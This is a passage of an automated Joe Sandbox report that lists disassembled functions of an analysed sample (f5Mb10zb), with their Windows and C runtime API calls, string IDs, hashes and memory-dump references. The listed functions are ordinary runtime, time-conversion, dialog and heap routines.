                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                    • API String ID: 3053425827-2277559157
                                                                                    • Opcode ID: c7a4bca8880fb59bf1712c684d68a0acca1a897b2d17a06c8de5a9c281f56a57
                                                                                    • Instruction ID: 0a0a6aadf7980718e3b7b8ae622b68be9aeefc6ad1e12c60609e9cda79f15c9d
                                                                                    • Opcode Fuzzy Hash: c7a4bca8880fb59bf1712c684d68a0acca1a897b2d17a06c8de5a9c281f56a57
                                                                                    • Instruction Fuzzy Hash: 4DF14A71604360EBDB25EF24A499BFE77996F90300F08056DFD869B283DB6CC946C762
                                                                                    Function 00739CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                    • API String ID: 176396367-3568243669
                                                                                    • Opcode ID: ffaa280e4b790bd46710e4d0d78d50acd12c5ab5dc0b8e06df9738e7bf731ae5
                                                                                    • Instruction ID: ee8dc5d5627fc49e532af121c79f014a488183c3d0fa5eb7ce6b0bb9d24eb97a
                                                                                    • Opcode Fuzzy Hash: ffaa280e4b790bd46710e4d0d78d50acd12c5ab5dc0b8e06df9738e7bf731ae5
                                                                                    • Instruction Fuzzy Hash: C351D65775532395FB30AA159C1277673E0DFA1751F58041AEBC18B2C2FBED8C8182A1
                                                                                    Function 0074F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0074FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0074F6CF
                                                                                    • __fassign.LIBCMT ref: 0074F74A
                                                                                    • __fassign.LIBCMT ref: 0074F765
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0074F78B
                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0074FE02,00000000,?,?,?,?,?,?,?,?,?,0074FE02,00000000), ref: 0074F7AA
                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0074FE02,00000000,?,?,?,?,?,?,?,?,?,0074FE02,00000000), ref: 0074F7E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    • Opcode ID: 2b8d7c53b63a3f9868f77b05fb1cd2a14deacdee027372e8a99dfc7bce3eb144
                                                                                    • Instruction ID: 546eafb60eae362f27362c5f8767dcc124f6b9825f4f8fc5ca71ff899f49f8ba
                                                                                    • Opcode Fuzzy Hash: 2b8d7c53b63a3f9868f77b05fb1cd2a14deacdee027372e8a99dfc7bce3eb144
                                                                                    • Instruction Fuzzy Hash: 4D51B7B1D002099FDB10CFA4DC45AEEBBF8FF09310F15416AE555E7291E774AA41CBA4
                                                                                    Function 0073CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0073CE9D
                                                                                      • Part of subcall function 0072B690: _wcslen.LIBCMT ref: 0072B696
                                                                                    • _swprintf.LIBCMT ref: 0073CED1
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • SetDlgItemTextW.USER32(?,00000066,0076946A), ref: 0073CEF1
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0073CF22
                                                                                    • EndDialog.USER32(?,00000001), ref: 0073CFFE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                    • String ID: %s%s%u
                                                                                    • API String ID: 689974011-1360425832
                                                                                    • Opcode ID: 906ff9773b5faa33080391e1e23ae007f5353de706bced480bd276ad666a4d66
                                                                                    • Instruction ID: 32139151f64d2cec494fc534ad13de3987c837d6eb291042d48209c094f868ff
                                                                                    • Opcode Fuzzy Hash: 906ff9773b5faa33080391e1e23ae007f5353de706bced480bd276ad666a4d66
                                                                                    • Instruction Fuzzy Hash: 8D4194B1900659EAEF259B60DC55EEA77BCEB04340F408096FA0AF7042EF789E44CF65
                                                                                    Function 00742900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00742937
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0074293F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 007429C8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 007429F3
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00742A48
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    • Opcode ID: 06462bb893644e91f1094b01d7c390c85d0148c07e44a90d8f8426a4388c091b
                                                                                    • Instruction ID: 7e608614f62e5a33cc000b61328f9f9edaf4d7a6a77add79381f1cddc120a424
                                                                                    • Opcode Fuzzy Hash: 06462bb893644e91f1094b01d7c390c85d0148c07e44a90d8f8426a4388c091b
                                                                                    • Instruction Fuzzy Hash: 9D41A634A00208EFCF10DF68C885A9E7BB5AF45324F54C155FC19AB393D779AA26CB91
                                                                                    Function 00739955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                    • API String ID: 176396367-3743748572
                                                                                    • Opcode ID: 981f83c64f4735236670df370d33de393fd5e392a9f27ec543e13582c690cb2a
                                                                                    • Instruction ID: 8191ec3f4aedca0c52c6340bad3e928070f545265447f5a5e6261aa708864654
                                                                                    • Opcode Fuzzy Hash: 981f83c64f4735236670df370d33de393fd5e392a9f27ec543e13582c690cb2a
                                                                                    • Instruction Fuzzy Hash: 3B315E7264434596FA30AB549C42B7A73E4EB90720F50C51EFA8647281FBEDAD84C3A2
                                                                                    Function 0074C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0074C868: _free.LIBCMT ref: 0074C891
                                                                                    • _free.LIBCMT ref: 0074C8F2
                                                                                      • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                      • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                    • _free.LIBCMT ref: 0074C8FD
                                                                                    • _free.LIBCMT ref: 0074C908
                                                                                    • _free.LIBCMT ref: 0074C95C
                                                                                    • _free.LIBCMT ref: 0074C967
                                                                                    • _free.LIBCMT ref: 0074C972
                                                                                    • _free.LIBCMT ref: 0074C97D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                    • Instruction ID: a63fb4b834cb868cc1fa71c29a04147911f3cdb715892f3edea46d4513544623
                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                    • Instruction Fuzzy Hash: E2111271A8270CE6E5A1B771CC0FFCB7BAC9F04B00F404C15B29D66092DB69B5058B91
                                                                                    Function 0073E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0073E669,0073E5CC,0073E86D), ref: 0073E605
                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0073E61B
                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0073E630
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                    • API String ID: 667068680-1718035505
                                                                                    • Opcode ID: 68db52316659a59a4e0a06e2fe2a97a707db5b06f8885cca4bf9adc9d8439be7
                                                                                    • Instruction ID: 6d80d8e64e327145afa81ba3d8b0457f7b07c3e23184f94718bdc685b73f56c3
                                                                                    • Opcode Fuzzy Hash: 68db52316659a59a4e0a06e2fe2a97a707db5b06f8885cca4bf9adc9d8439be7
                                                                                    • Instruction Fuzzy Hash: 4FF046B1380322CB2F214F654C9A5AA22DE6A20382B108038EC05D31D2FB9CCC255BA4
                                                                                    Function 00748900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0074891E
                                                                                      • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                      • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                    • _free.LIBCMT ref: 00748930
                                                                                    • _free.LIBCMT ref: 00748943
                                                                                    • _free.LIBCMT ref: 00748954
                                                                                    • _free.LIBCMT ref: 00748965
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID: pu
                                                                                    • API String ID: 776569668-250260183
                                                                                    • Opcode ID: 2960301863999a219f5d9d61578cffb99fe290ff3cfcb903f5ec30ca11127ad2
                                                                                    • Instruction ID: cf02ad04314a453d07231639c371a063adbaeca253214bc9a17777f2743c044d
                                                                                    • Opcode Fuzzy Hash: 2960301863999a219f5d9d61578cffb99fe290ff3cfcb903f5ec30ca11127ad2
                                                                                    • Instruction Fuzzy Hash: 0DF03071A5121ACB86866F14FC0644D3BA1F7287223128505F414932B3DF7E4A529FCA
                                                                                    Function 0073146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 007314C2
                                                                                      • Part of subcall function 0072B146: GetVersionExW.KERNEL32(?), ref: 0072B16B
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007314E6
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00731500
                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00731513
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00731523
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00731533
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                    • String ID:
                                                                                    • API String ID: 2092733347-0
                                                                                    • Opcode ID: 8aab30d03835559200969dd1c7a7b3f4ea54a1636227a323749d95a5709f7450
                                                                                    • Instruction ID: 451628197a800f40586f124cfa94da2d4ae63f75155ddcc6354927d259a41df7
                                                                                    • Opcode Fuzzy Hash: 8aab30d03835559200969dd1c7a7b3f4ea54a1636227a323749d95a5709f7450
                                                                                    • Instruction Fuzzy Hash: 9F31FA75108345ABC700DFA8C88499BB7F8BF98754F40891EF595C3210E774D509CBA6
                                                                                    Function 00742AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00742AF1,007402FC,0073FA34), ref: 00742B08
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00742B16
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00742B2F
                                                                                    • SetLastError.KERNEL32(00000000,00742AF1,007402FC,0073FA34), ref: 00742B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 941b8fc60ab8f0a0760981059792d9aed4bd2fce025dc9066de6a83096149548
                                                                                    • Instruction ID: a9f1ea530f9bbf9067e35afeccb12d2acbdafda7804a21533dfcc871764861df
                                                                                    • Opcode Fuzzy Hash: 941b8fc60ab8f0a0760981059792d9aed4bd2fce025dc9066de6a83096149548
                                                                                    • Instruction Fuzzy Hash: 44019772208311AEA6582F747C899AB2F59EF047B67E04B3DF018480F2FF9C4D12D208
                                                                                    Function 007497E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,00761030,00744674,00761030,?,?,00743F73,00000050,?,00761030,00000200), ref: 007497E9
                                                                                    • _free.LIBCMT ref: 0074981C
                                                                                    • _free.LIBCMT ref: 00749844
                                                                                    • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 00749851
                                                                                    • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 0074985D
                                                                                    • _abort.LIBCMT ref: 00749863
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 3160817290-0
                                                                                    • Opcode ID: 407f09584101771a1c7ffcd5bbcdb3846257fc3f153111c670ff0065badf355e
                                                                                    • Instruction ID: d7c51eeeb642bed1ef9f4956517817742778ed1efef11298508012367ec9bd30
                                                                                    • Opcode Fuzzy Hash: 407f09584101771a1c7ffcd5bbcdb3846257fc3f153111c670ff0065badf355e
                                                                                    • Instruction Fuzzy Hash: A5F0F435240701F7C65233286C0EA6B2A6E8FE2772F224124F728961E2EF6C8802456A
                                                                                    Function 0073DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0073DC47
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073DC61
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073DC72
                                                                                    • TranslateMessage.USER32(?), ref: 0073DC7C
                                                                                    • DispatchMessageW.USER32(?), ref: 0073DC86
                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0073DC91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
